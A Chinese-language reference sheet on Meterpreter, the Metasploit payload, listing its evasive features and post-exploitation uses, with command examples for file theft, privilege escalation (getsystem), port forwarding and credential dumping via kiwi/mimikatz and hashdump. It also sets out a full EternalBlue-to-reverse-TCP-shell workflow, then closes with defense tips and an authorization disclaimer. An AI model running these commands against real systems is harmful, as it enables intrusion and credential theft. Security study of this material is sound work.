什么是 Meterpreter?
Meterpreter 是 Metasploit 框架中最强大的后门载荷(Payload),一种内存级交互式 Shell,提供远程控制和高级渗透功能。
全称:Meta-Interpreter,运行在内存中,不创建独立进程
核心特性
特性 | 说明 |
|---|---|
💉 内存注入 | 不落地磁盘,规避杀毒软件 |
🔄 多平台支持 | Windows/Linux/macOS/Android |
🎭 高隐匿性 | 通过 DLL 注入方式运行 |
🔌 模块化设计 | 支持大量扩展模块 |
📡 双向加密通信 | 传输数据加密 |
🐚 交互式 Shell | 真正的远程命令行 |
工作原理
使用场景
场景 | 说明 |
|---|---|
后渗透阶段 | 获得 Shell 后提升为 Meterpreter |
权限维持 | 在目标机器建立持久后门 |
横向移动 | 以目标为跳板攻击内网其他机器 |
信息收集 | 抓密码、截屏幕、键盘记录 |
数据窃取 | 下载文件、读取数据库 |
内网穿透 | 建立隧道进入内网 |
常用命令
系统操作
# 查看系统信息 sysinfo # 查看当前用户 getuid # 获取 Shell shell # 上传/下载文件 upload /path/file C:\\target\\ download C:\\secret.txt /tmp/ # 截图 screenshot # 屏幕录制 screengrab权限操作
# 提权到 SYSTEM getsystem # 迁移进程 migrate <pid> # 查看进程 ps网络操作
# 查看网络配置 ipconfig # 查看路由表 route # 建立端口转发 portfwd add -l 3389 -p 3389 -r 192.168.1.100密码/凭证
# 加载 mimikatz 模块 load kiwi # 获取明文密码 creds_all # 获取哈希 hashdump常见使用流程
1. msfconsole 启动控制台 2. use exploit/windows/smb/eternalblue # 选择漏洞利用模块 3. set payload windows/x64/meterpreter/reverse_tcp # 设置 Meterpreter Payload 4. set LHOST <攻击机IP> 5. set RHOST <目标IP> 6. exploit # 发起攻击 7. sysinfo # 确认目标系统 8. getsystem # 提权 9. hashdump # 抓密码哈希优缺点
优点 | 缺点 |
|---|---|
✅ 内存注入,难以被查杀 | ❌ 依赖 Metasploit 框架 |
✅ 功能强大,模块丰富 | ❌ 流量特征明显(大目标) |
✅ 跨平台支持 | ❌ 需要正确配置 Handler |
✅ 易于扩展定制 | ❌ 已被安全设备重点监控 |
防御建议
📌 监控网络流量 — 检测异常的 Meterpreter 通信特征
📌 端点检测 — 检查进程注入行为
📌 内存保护 — 使用 EDR 防护
📌 最小权限 — 限制用户权限,减少提权风险
一句话总结:Meterpreter 是渗透测试中的"瑞士军刀",是后渗透阶段的标配工具,功能覆盖远程控制、信息收集、权限提升、内网横移等全链路。
⚠️声明: Meterpreter 是安全研究工具,请勿用于未授权测试。
